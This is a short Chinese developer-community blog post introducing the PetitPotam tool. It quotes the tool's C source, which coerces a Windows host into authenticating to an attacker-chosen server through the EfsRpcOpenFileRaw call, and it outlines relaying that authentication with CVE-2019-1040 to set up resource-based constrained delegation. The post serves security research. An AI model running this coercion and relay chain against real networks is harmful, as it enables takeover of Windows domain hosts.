备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

PetitPotam——另一种方式触发Windows主机认证

2023-10-07 50
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: PetitPotam——另一种方式触发Windows主机认证

https://github.com/topotam/PetitPotam

收到GitHub推送看到了一个新工具可以触发Windows主机认证请求,

通过MS-EFSRPC协议的EfsRpcOpenFileRaw函数

查看源代码:

int wmain(int argc, wchar_t** argv, wchar_t** envp)
{
  wprintf(L"Usage: PetitPotam.exe <captureServerIP> <targetServerIP> \n");
  handle_t ht = Bind(argv[2]);
  HRESULT hr = NULL;
  PEXIMPORT_CONTEXT_HANDLE plop;
  SecureZeroMemory((char*)&(plop), sizeof(plop));
  wchar_t buffer[100];
  swprintf(buffer, 100, L"\\\\%s\\test\\topotam.exe", argv[1]);
  long flag = 0;
  hr = EfsRpcOpenFileRaw(ht, &plop, buffer, flag);
  if (hr == ERROR_BAD_NETPATH) {
    wprintf(L"Attack success!!!\n");
  }
  return 0;
}

第四行向目标机器RPC进行认证返回句柄,然后构造参数后直接调用EfsRpcOpenFileRaw这个API

老样子,认证还是SMB,是带签名的可以配合CVE-2019-1040进行relay操作,而且在我测试2008printbug用不了的主机通过此工具也可以成功触发请求

然后中继机器收到请求

成功配置了RBCD

文章标签:
Windows
API
关键词:
Windows主机
1508026077072612
目录
相关文章
1227507367497292
|
网络协议 网络安全 虚拟化
解决虚拟机安装windows7无法与主机ping通的解决方案
解决虚拟机安装windows7无法与主机ping通的解决方案
1227507367497292
799 0
解决虚拟机安装windows7无法与主机ping通的解决方案
游客dk64xrhekz3ko
|
存储 分布式计算 安全
VMware 安装CentOS7配置环境、安装虚拟机、选择cd/dvd的方式安装系统、系统安装引导界面、需要定制化的内容、配置磁盘分区、修改主机名、网络配置、修改windows的主机映射文件(host
调整时间差、安装GHOME(图形化界面的方式)注意图上标注的点击顺序、添加boot、添加swap交换分区、配置根(/)目录、编辑VMware的网络配置、Windows的网络配置、虚拟机网络IP修改地址配置、修改主机名和hosts文件、配置Linux克隆机主机名称映射hosts文件,打开/etc/hosts、关闭 kdump本身虚拟机内存就不够,他会吃掉一部分内存,我们尽量省一点、是否打开安全协议(开启与否都可以)、安装时间比较长大概需要10几分钟(设置root用户密码,一定要设置)、创建一个普通用户(可以不
游客dk64xrhekz3ko
483 1
VMware 安装CentOS7配置环境、安装虚拟机、选择cd/dvd的方式安装系统、系统安装引导界面、需要定制化的内容、配置磁盘分区、修改主机名、网络配置、修改windows的主机映射文件(host
rqbarzitsudte
|
监控 前端开发 安全
CentOS7 部署 Zabbix 监控平台———监控网络设备,Linux 主机、Windows 主机
Zabbix 能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。是一个基于 Web 界面的提供分布式系统监视以及网络监视功能的企业级开源解决方案。
rqbarzitsudte
993 0
CentOS7 部署 Zabbix 监控平台———监控网络设备,Linux 主机、Windows 主机
游客677xsv64z
|
2月前
|
弹性计算 Ubuntu Linux
2024年Windows/Linux搭建幻兽帕鲁主机教程(超详细图文)
幻兽帕鲁作为一款热门多人在线游戏,为了给玩家提供稳定、流畅的联机体验,阿里云提供了高效便捷的快速部署解决方案,本文将为大家介绍阿里云一键部署幻兽帕鲁联机服务器详细教程。
游客677xsv64z
55 3
非著名运维
|
6月前
|
运维 安全 Linux
企业实战(18)超简单实现轻量级开源堡垒机Teleport管理Linux/Windows主机(2)
企业实战(18)超简单实现轻量级开源堡垒机Teleport管理Linux/Windows主机(2)
非著名运维
63 0
授客
|
安全 Java jenkins
Jenkins 解决Jenkins下java无法运行slave-agent jnlp程序连接Windows Slave主机
Jenkins 解决Jenkins下java无法运行slave-agent jnlp程序连接Windows Slave主机
授客
233 0
QGS
|
监控 Windows
(Centos7-x86)zabbix5.0—agent2 监控windows主机
记(Centos7-x86)zabbix5.0—agent2 监控windows主机
QGS
119 0
(Centos7-x86)zabbix5.0—agent2 监控windows主机
柳鲲鹏
|
Windows
全网首发:WINDOWS主机与MAC虚拟机文件访问的解决办法
全网首发:WINDOWS主机与MAC虚拟机文件访问的解决办法
柳鲲鹏
152 0
全网首发:WINDOWS主机与MAC虚拟机文件访问的解决办法
柳鲲鹏
|
Java Linux Windows
LINUX虚拟机与WINDOWS主机,直接复制交换文件会有问题
LINUX虚拟机与WINDOWS主机,直接复制交换文件会有问题
柳鲲鹏
102 0
Redamancy
|
存储 分布式计算 安全
VMware 安装CentOS7配置环境、安装虚拟机、选择cd/dvd的方式安装系统、系统安装引导界面、需要定制化的内容、配置磁盘分区、修改主机名、网络配置、修改windows的主机映射文件(host
调整时间差、安装GHOME(图形化界面的方式)注意图上标注的点击顺序、添加boot、添加swap交换分区、配置根(/)目录、编辑VMware的网络配置、Windows的网络配置、虚拟机网络IP修改地址配置、修改主机名和hosts文件、配置Linux克隆机主机名称映射hosts文件,打开/etc/hosts、关闭 kdump本身虚拟机内存就不够,他会吃掉一部分内存,我们尽量省一点、是否打开安全协议(开启与否都可以)、安装时间比较长大概需要10几分钟(设置root用户密码,一定要设置)、创建一个普通用户(可以不
Redamancy
264 1
VMware 安装CentOS7配置环境、安装虚拟机、选择cd/dvd的方式安装系统、系统安装引导界面、需要定制化的内容、配置磁盘分区、修改主机名、网络配置、修改windows的主机映射文件(host

热门文章

最新文章

  • 1
    Windows窗口程序
  • 2
    Linux&Windows 日志分析 陇剑杯 CTF
  • 3
    Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
  • 4
    .NET开源免费、功能强大的 Windows 截图录屏神器
  • 5
    【C++/Python】Windows用Swig实现C++调用Python(史上最简单详细,80岁看了都会操作)
  • 6
    Windows12安装Docker
  • 7
    安装MyEclipse遇到错误提示 Failed to find a Main Class in “C:Windows\Temp\“时的解决方案
  • 8
    Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
  • 9
    Windows线程
  • 10
    .NET开源免费的Windows快速文件搜索和应用程序启动器
  • 1
    Windows公网远程连接MongoDB数据库【无公网IP】
    48
  • 2
    Windows环境下面启动jar包,输出的日志出现乱码的解决办法
    53
  • 3
    Qt5.14.2 轻松掌握Qt中的压缩与解压缩:QuaZIP的神秘面纱与实战演练之windows环境编译
    78
  • 4
    无远不至的掌控力:探索Windows Server 2019的远程访问绝招
    22
  • 5
    windows server 2019 安装NET Framework 3.5失败,提示:“安装一个或多个角色、角色服务或功能失败” 解决方案
    143
  • 6
    解锁安全之门,Windows Server 2019密码修改攻略大揭秘
    76
  • 7
    铁壁如墙-WINDOWS SERVER 2019勒索病毒终极防御指南
    54
  • 8
    Windows Server 2019 IIS HTTPS证书部署流程详解
    79
  • 9
    windows下快速安装nginx 并配置开机自启动
    62
  • 10
    windows下采用 nginx配置websocket支持wss流程
    37

    • 相关课程

    更多
  • Linux用户和组管理
  • Linux 用户及权限

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 部署Linux主机管理系统WDCP
  • 手动搭建FTP站点(Windows)
  • 通过会话管理端口转发功能访问ECS内部服务
  • 使用云助手公共命令快速安装Java环境
  • 远程桌面环境使用指南
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)